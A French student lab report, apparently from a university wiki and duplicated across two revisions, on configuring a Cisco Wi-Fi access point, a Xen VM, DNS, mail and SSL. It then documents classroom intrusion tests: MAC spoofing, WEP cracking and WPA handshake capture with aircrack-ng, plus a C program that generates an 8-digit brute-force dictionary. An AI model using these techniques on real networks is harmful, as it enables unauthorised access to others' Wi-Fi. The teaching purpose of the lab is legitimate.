Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<h2>Configuration pour connexion télenet</h2><br />
<br />
On commence par remettre le point d’accès en configuration d'usine <br />
<pre><br />
ap#erase startup-config<br />
ap#reload<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<pre><br />
#nano 000-domain.tld-ssl.conf<br />
<VirtualHost 193.48.57.181:443><br />
<br />
ServerName www.love-in-the-world.space<br />
ServerAlias love-in-the-world.space<br />
DocumentRoot /var/www/html/<br />
CustomLog /var/log/apache2/secure_access.log combined<br />
<br />
SSLEngine on<br />
SSLCertificateFile /root/chien.crt<br />
SSLCertificateKeyFile /root/chien.key<br />
SSLCertificateChainFile /root/gandi.crt<br />
SSLVerifyClient None<br />
<br />
</VirtualHost><br />
<br />
#a2enmod ssl<br />
#service apache2 reload<br />
</pre><br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
<br />
</pre><br />
<br />
<br />
creation d'un dictionaire :<br />
Je Créer un dictionaire pour comparer le handshake que j'ai recuperer avec des cles possible.<br />
la cles etant comprise entre 00000000 et 99999999 je réalise un petit programme qui affiche toutes ces valeurs: <br />
<pre><br />
#include <stdio.h><br />
int main ()<br />
{<br />
int val=0;<br />
for(val=0;val<99999999 ;val++)<br />
{printf("%08d\n",val); }<br />
return 0;<br />
}<br />
</pre><br />
Compilation :<br />
</pre><br />
gcc -Wall Dictionnaire.c -o Dictionnaire<br />
</pre><br />
<br />
Création :<br />
On exécute le programme Dictionnaire et on renvoi les résultats dans le fichier Dico<br />
<pre><br />
./Dictionnaire > Dico<br />
</pre><br />
<br />
<br />
<br />
Cassage de la cles: <br />
après avoir récuperer le Handshake du Wifi carotte06<br />
Je vais casser la clés en utilisant mon dictionnaire "Dico" le fichier "wpacracotte06-02.cap"<br />
<pre><br />
aircrack-ng -w Dico wpacracotte06-02.cap<br />
</pre><br />
<br />
après quelle que heures j'obtiens la clès:<br />
<pre><br />
Aircrack-ng 1.2 beta3<br />
<br />
<br />
[02:00:57] 12399908 keys tested (1782.72 k/s)<br />
<br />
<br />
KEY FOUND! [ 12399906 ]<br />
<br />
<br />
Master Key : 4B 0E E0 87 93 06 14 C0 E2 64 55 76 95 9A 30 6B <br />
75 7C 8F CC B4 F8 2B 0D 78 3A 57 04 79 C2 F9 72 <br />
<br />
Transient Key : 63 0F 9B D4 8B 09 C9 2C D5 E2 56 3D C7 21 AC 9E <br />
94 5C E6 F7 19 FB EA 52 3F 02 C4 10 72 4F B8 7E <br />
F1 92 CC 2C 02 E1 F7 47 C1 1D F2 FD CE EF F5 5E <br />
22 24 87 42 46 4F D6 38 DF D4 CC 6D 61 4E 1D 7E <br />
<br />
EAPOL HMAC : A3 D3 FD F5 09 AC B9 96 F5 0E 93 0A 3C 63 36 CD <br />
</pre><br />
<br />
<br />
<br />
<br />
mettre serveur messagerie <br />
demander certificat<br />
<br />
securisation wifi <br />
WPA-EAP</div>
Mstrunc
https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G3&diff=23140
TP sysres IMA2a5 2015/2016 G3
2015-11-23T15:02:39Z
<p>Mstrunc : </p>
<hr />
<div><br /><br />
Ce mini projet a pour but de nous donner des notion en sécurité informatique.<br />
<br />
<br />
<h1>Configuration du point d’accès</h1><br />
<br />
<h2>Restriction par adresse MAC </h2><br />
<br />
Ci-dessous, le tableau regroupant Les adresses et Vlan associés aux élèves :<br />
<br />
<table><br />
<tr><th>Nom</th><th>adresse MAC</th></tr><br />
<tr><th>Nounours</th><th>00:15:af:e7::19:f3</th></tr><br />
<tr><th>Jeuno</th><th>00:15:af:e6:ed:b1</th></tr><br />
<tr><th>John</th><th>00:22:43:43:e7:7d</th></tr><br />
<tr><th>Loki</th><th>00:15:af:e7:64:03</th></tr><br />
</table><br />
<br />
On récupère les adresses mac comme ci dessous.<br />
<pre><br />
pifou@heron:~$ su<br />
Mot de passe : <br />
root@heron:/home/pifou# ifconfig <br />
lo Link encap:Boucle locale <br />
inet adr:127.0.0.1 Masque:255.0.0.0<br />
adr inet6: ::1/128 Scope:Hôte<br />
UP LOOPBACK RUNNING MTU:65536 Metric:1<br />
RX packets:2348 errors:0 dropped:0 overruns:0 frame:0<br />
TX packets:2348 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:0 <br />
RX bytes:244556 (238.8 KiB) TX bytes:244556 (238.8 KiB)<br />
<br />
wlan0 Link encap:Ethernet HWaddr 00:22:43:43:e7:7d <br />
inet adr:172.26.79.61 Bcast:172.26.79.255 Masque:255.255.240.0<br />
adr inet6: fe80::222:43ff:fe43:e77d/64 Scope:Lien<br />
adr inet6: 2001:660:4401:6006:222:43ff:fe43:e77d/64 Scope:Global<br />
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1<br />
RX packets:12046 errors:0 dropped:1471 overruns:0 frame:0<br />
TX packets:9787 errors:0 dropped:0 overruns:0 carrier:0<br />
collisions:0 lg file transmission:1000 <br />
RX bytes:7742849 (7.3 MiB) TX bytes:1442360 (1.3 MiB)<br />
</pre><br />
<br />
<br />
<h3>Configuration du point d’accès Cisco </h3><br />
Conexion a la borne Cisco :<br />
-Branchement en comunication serie sur le port RJ45 (Console de la Cisco).<br />
<br />
<pre><br />
pifou@zabeth04:~$ su<br />
pifou@zabeth04:~$ minicom<br />
<br />
// conexion au point Cisco <br />
ap#enable<br />
ap#Config t <br />
</pre><br />
<br />
Il faut autoriser les adresses mac désignés à ce connecter aux point d’accès et refuser l’accès des autres <br />
<br />
<pre><br />
ap(config)#no access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
ap(config)#access-list 701 permit 0015.afe7.6403 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 permit 0015.afe7.19f3 0000.0000.0000<br />
ap(config)#access-list 701 permit 0015.afe6.edb1 0000.0000.0000 <br />
ap(config)#access-list 701 deny 0000.0000.0000 ffff.ffff.ffff <br />
</pre><br />
<br />
<br />
<br />
Configuration du SSID <br />
<pre><br />
ap(config)#dot11 ssid T2<br />
ap(config-ssid)#dot11 ssid T2 <br />
ap(config-ssid)#authentication open<br />
ap(config-ssid)#guest-mode <br />
ap(config)#interface dot11Radio0 <br />
<br />
ap(config-if)#ssid T2<br />
ap(config-if)#encryption key 1<br />
ap(config-if)#encryption key 1 size 40bit 0 01abcd1532 transmit-key<br />
ap(config-if)#encryption mode Wep mandatory <br />
end<br />
<br />
ap(config)#interface Dot11Radio0<br />
ap(config-if)#no shutdown<br />
</pre><br />
<br />
Pour voir si des machines sont connecté sur le point d’accès <br />
</pre><br />
sh do11 associations<br />
</pre><br />
<br />
<h3>Configuration du Wifi sur l'eeePC</h3><br />
Cette partie me sert a valider le bon fonctionnement de mon point d’accès.<br />
Je l'a réutiliserais dans la partie d'intrusion par adresse MAC. <br />
<br />
Configuration:<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T2<br />
wireless-key 1111111111<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
<br />
conexion au PA<br />
<pre><br />
ifup wlan0<br />
iwconfig wlan0 essid T2<br />
</pre><br />
<br />
on est bien connecté :<br />
<pre><br />
wlan0 IEEE 802.11bgn ESSID:"T2" <br />
Mode:Managed Frequency:2.447 GHz Access Point: C4:14:3C:12:EA:00 <br />
Bit Rate=54 Mb/s Tx-Power=20 dBm <br />
Retry short limit:7 RTS thr:off Fragment thr:off<br />
Encryption key:1111-1111-11<br />
Power Management:off<br />
Link Quality=70/70 Signal level=-38 dBm <br />
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0<br />
Tx excessive retries:0 Invalid misc:4104 Missed beacon:0<br />
<br />
lo no wireless extensions.<br />
<br />
eth0 no wireless extensions.<br />
</pre><br />
<br />
<br />
<br />
<h1>Installation des systèmes d'exploitation </h1><br />
Dans ce chapitre je vais installer deux système d'exploitation , Il s'agit de Debian 8.<br />
Dans un premier temps j’installerais une machine virtuel Xen sur la cordouan, le but étant par la suite de réaliser un serveur web sécurisé.<br />
Dans une seconde partie j’installerais Debian 8 sur un des nouveau pc HP que nous avons reçut, nous nous en serviront pour la partie des tests d'intrusions. <br />
<br />
<h2>Installation de la machine virtuel</h2><br />
Cette partie concerne l’installation du machine virtuel Xen.<br />
Nous installons Xen car celui-ci permet de faire de la paravirtualisation. <br />
Nous en avons besoins pour que chacun puisse installer son propre système d'exploitation et qu'ils soit utilisable en même temps <br />
<br />
Les étapes a suivre pour l’installation de Xen sur cordouan:<br />
<pre><br />
// Conexion au serveur <br />
ssh root@cordouan.insecserv.deule.net<br />
<br />
// Création de la Machine virtuel ( nom : chien)<br />
xen-create-image --hostname chien --ip 193.48.57.181 --dir /usr/local/xen<br />
<br />
// On observe la virtualisation<br />
tail -f /var/log/xen-tools/chien.log<br />
<br />
root@cordouan:~# cd /etc/xen/<br />
root@cordouan:/etc/xen# vim chien.cfg <br />
// on met plus de memoire => 1024<br />
// conexion en mode bridge=IMA2a<br />
<br />
root@cordouan:/etc/xen# xl list<br />
root@cordouan:/etc/xen# xl create chien.cfg<br />
</pre><br />
<br />
connexion à notre MV:<br />
<pre><br />
ssh root@cordouan.insecserv.deule.net<br />
root@cordouan:/etc/xen# xl console chien<br />
</pre><br />
<br />
Configuration de Xen:<br />
- On autorise les connexion ssh en root<br />
- On retire Network Manger pour configurer la connexion au réseau manuellement <br />
<pre><br />
/etc/ssh/sshd_config<br />
PermitRootLogin yes<br />
<br />
if down eth0 <br />
ifup etho<br />
apt-get purge network-manage systemd <br />
/etc/inittable<br />
// fin ligne tty0 ==> hvc0<br />
</pre><br />
<br />
<pre><br />
// Configuration de eth0<br />
# The primary network interface<br />
auto eth0<br />
iface eth0 inet static<br />
address 193.48.57.181<br />
netmask 255.255.255.240<br />
gatway 193.48.57.190<br />
<br />
root@chien:~# ifdown eth0 <br />
root@chien:~# ifup eth0<br />
<br />
<br />
root@chien:~# apt-get install vim strace tcpdump <br />
root@chien:~# apt-get install host<br />
</pre><br />
<br />
<br />
<br />
<h1>Services Internet </h1><br />
<br />
<h2>Serveur DNS</h2><br />
modification du fichier /var/cache/bind option<br />
<pre><br />
cat /etc/bind/named.conf.options <br />
**** afficher le fichier ****<br />
<br />
host -t ni love-in-the-world.space<br />
host -t any love-in-the-world.space<br />
<br />
cat db.love-in-the-world <br />
**** afficher le fichier ****<br />
<br />
cat /var/log/daemon.log<br />
**** afficher le fichier ****<br />
<br />
service bind9 stop<br />
service bind9 start<br />
</pre><br />
<br />
<h2>Recuperation du certificat SSL</h2><br />
Cette étape consiste a récupérer le certificat SSL en vu authentifier et de sécuriser la connexion a notre serveur <br />
<br />
Instalation et Configuration de la boite Mail <br />
<pre><br />
apt-get install postfix bsd-mailx<br />
</pre><br />
<br />
configuration de la boite mail <br />
<pre><br />
#nano /etc/aliases<br />
postmaster: root<br />
admin: root<br />
<br />
#newaliases<br />
#mailx<br />
</pre><br />
<br />
Je m'envoi un mail pour verifier le bon fonctionement de la boite mail <br />
E-mail: admin@love-in-the-world.space<br />
<br />
Verfification:<br />
<pre><br />
#mailx<br />
From Maxime.Strunc@polytech-lille.net Fri Nov 20 13:22:24 2015<br />
Return-Path: <Maxime.Strunc@polytech-lille.net><br />
X-Original-To: admin@love-in-the-world.space<br />
Delivered-To: admin@love-in-the-world.space<br />
Received: from peronne.escaut.net (peronne.escaut.net [193.48.57.26])<br />
by chien (Postfix) with ESMTP id E7DA93421F<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 13:22:24 +0100 (CET)<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
X-Virus-Scanned: Debian amavisd-new at polytech-lille.fr<br />
Received: from webmailportal.polytech-lille.fr (hirson.escaut.net [193.48.57.37])<br />
(Authenticated sender: mstrunc)<br />
by peronne.escaut.net (Postfix) with ESMTPA id 305081C38<br />
for <admin@love-in-the-world.space>; Fri, 20 Nov 2015 11:33:52 +0100 (CET)<br />
MIME-Version: 1.0<br />
Content-Type: text/plain; charset=UTF-8;<br />
format=flowed<br />
Content-Transfer-Encoding: 7bit<br />
Date: Fri, 20 Nov 2015 11:33:52 +0100<br />
From: Maxime Strunc <Maxime.Strunc@polytech-lille.net><br />
To: <admin@love-in-the-world.space><br />
Subject: Hello<br />
Message-ID: <478f6b7d2da9875c32551984f2b92f9f@polytech-lille.net><br />
X-Sender: Maxime.Strunc@polytech-lille.net<br />
User-Agent: Roundcube Webmail/0.7.2<br />
Status: RO<br />
<br />
Hey it's working<br />
</pre><br />
<br />
- Recupération du Certificat:<br />
Je vais sur Gandi.net<br />
<br />
génération de la CSR<br />
<pre><br />
root@chien:~# openssl req -nodes -newkey rsa:2048 -sha256 -keyout chien.key -out chien.csr<br />
// Il ya plusieurs informations à rentrer, il y en a une très important : c'et le mail : <br />
admin@love-in-the-world.space<br />
</pre><br />
apres avoir renseigner tout les champs, <br />
j'obtient la CSR: <br />
<pre><br />
-----BEGIN CERTIFICATE REQUEST-----<br />
... texte crypter...<br />
-----END CERTIFICATE REQUEST-----<br />
</pre><br />
Je la copie dans l'emplacement voulue sur gandi.net<br />
<br />
Gandi m'envoi un mail a l'adresse informée "admin@love-in-the-world.space"<br />
Il faut donc clique sur un lien de confimation et entrer la cles fournit dans le mail.<br />
Une fois le certificat reçut, Je le copie et le colle dans le chien.crt et gandi.crt<br />
<br />
<h1>Test d'intrusion </h1><br />
<br />
<br />
<h2>Intrusion par changement d'adresse MAC</h2><br />
<br />
En remplacant l'adresse mac de mon eeepc par une adresses MAC que le point d’accès T1 autorise je pourrais me connecter sur celui-ci. <br />
<br />
Changement d'adresse MAC:<br />
<pre><br />
- ifconfig wlan0 down<br />
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1 //adresse mac de Gauthier<br />
- ifconfig wlan0 up<br />
</pre><br />
<br />
On change la cles par: 0000000000<br />
et le SSID : T1<br />
<pre><br />
root@heron:/home/pifou# cat /etc/network/interfaces<br />
source /etc/network/interfaces.d/*<br />
<br />
# The loopback network interface<br />
auto lo<br />
iface lo inet loopback<br />
<br />
# Ethernet interface<br />
#auto eth0<br />
#iface eth0 inet static<br />
# address 172.26.79.241<br />
# netmask 255.255.240.0<br />
# gateway 172.26.79.254<br />
<br />
auto wlan0<br />
iface wlan0 inet static<br />
wireless-mode managed<br />
wireless-essid T1<br />
wireless-key 0000000000<br />
address 172.26.79.61<br />
netmask 255.255.240.0<br />
gateway 172.26.79.254<br />
<br />
</pre><br />
Apres cette modification J'arrive a me connecter sur le point d’accès de Marouane(T1).<br />
<br />
<h2>Préparation aux cassage de clés</h2><br />
- Instalation aircrack-ng<br />
<pre><br />
apt-get install aircrack-ng firmware ralink<br />
</pre><br />
<br />
- Instalation du port usb-Wifi<br />
<pre><br />
apt-get install firmware ralink<br />
airmon-ng start wlan1<br />
</pre><br />
<br />
<h2>Cassage d'une cles WEP </h2><br />
<br />
Je scan le reseaux Wifi: <br />
<pre><br />
airodump-ng mon0 --channel 5<br />
</pre><br />
<br />
J’identifie le ssid de cracotte06 et je met les donnée dans un fichier nommé fcracotte06<br />
<pre><br />
<br />
root@Discus:/home/pifou# airodump-ng mon0 --channel 5 --bssid 04:DA:D2:9C:50:55 -w<br />
fcracotte06<br />
<br />
CH 5 ][ Elapsed: 0 s ][ 2015-11-20 09:05 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -55 28 29 420 116 5 54e. WEP WEP cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -48 36e-54e 80 456 <br />
</pre><br />
La capture a donc commencé <br />
<br />
Dans un autre terminal:<br />
Je vais analyser mon fichier de capture pour casser la cles.<br />
<pre><br />
ls<br />
aircrack-ng fcracotte06-01.cap<br />
</pre><br />
apres quelque minutes on obtient la cles <br />
<pre><br />
[00:06:58] Tested 965565 keys (got 60459 IVs)<br />
<br />
KB depth byte(vote)<br />
0 0/ 1 AA(85504) EA(73728) 60(70144) 0C(69120) 33(68608) <br />
1 0/ 1 AA(77824) 25(74496) BC(70400) 6C(70144) 3B(69632) <br />
2 0/ 1 AA(79872) 3E(70912) 76(70400) 5C(70144) 01(68864) <br />
3 4/ 5 AA(71680) FA(68608) 41(68352) 38(68096) 49(68096) <br />
4 0/ 1 AA(86016) A1(70912) 80(69632) 2A(68352) 65(68352) <br />
5 0/ 1 AA(85760) AF(73216) C6(71424) 5A(71168) 25(70400) <br />
6 0/ 1 AA(75520) 26(70400) CB(70400) 46(69888) 1C(69632) <br />
7 0/ 1 AA(83968) 18(71680) 4C(71424) 74(70144) 1E(69632) <br />
8 0/ 1 AA(82176) 6F(70912) F7(70144) FB(69632) 17(68864) <br />
9 0/ 3 D7(73216) 97(71168) A4(70400) BA(70144) FE(69632) <br />
10 0/ 1 5F(78336) D6(72960) 46(71424) CB(68608) 8D(68352) <br />
11 13/ 1 48(67072) 60(67072) F6(66816) AC(66560) 2B(66048) <br />
12 0/ 1 BB(79580) A7(71096) 8B(69960) 13(69196) 68(68424) <br />
<br />
KEY FOUND! [ AA:AA:AA:AA:AA:AA:AA:AA:AA:AA:BB:BB:BB ] <br />
Decrypted correctly: 100%<br />
</pre><br />
<br />
<h2>Cassage d'une cles WPA</h2><br />
Cette partie consiste a casser une clés WPA par force brute.<br />
Je m'interesse plus particulierement a caracotte06 comme précédament.<br />
<br />
Je vais dans une premier temps ecouter ce qui a sur ce réseau on suppose que quelle qu'un se connecte dessus régulièrement, le but étant de récupérer le handshake. <br />
<br />
Recuperation du Handshake: <br />
<pre><br />
airodump-ng --encrypt wpa mon0<br />
<br />
# airodump-ng --encrypt wpa mon0 -c 7 --bssid 04:DA:D2:9C:50:55 -w wpacracotte06<br />
<br />
CH 7 ][ Elapsed: 26 mins ][ 2015-11-20 10:40 ][ WPA handshake: 04:DA:D2:9C:50:55 <br />
<br />
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID<br />
<br />
04:DA:D2:9C:50:55 -70 22 9735 1905 18 7 54e. WPA2 CCMP PSK cracotte06 <br />
<br />
BSSID STATION PWR Rate Lost Frames Probe <br />
<br />
04:DA:D2:9C:50:55 00:0F:B5:92:23:74 -70 54e- 1e 904 1249
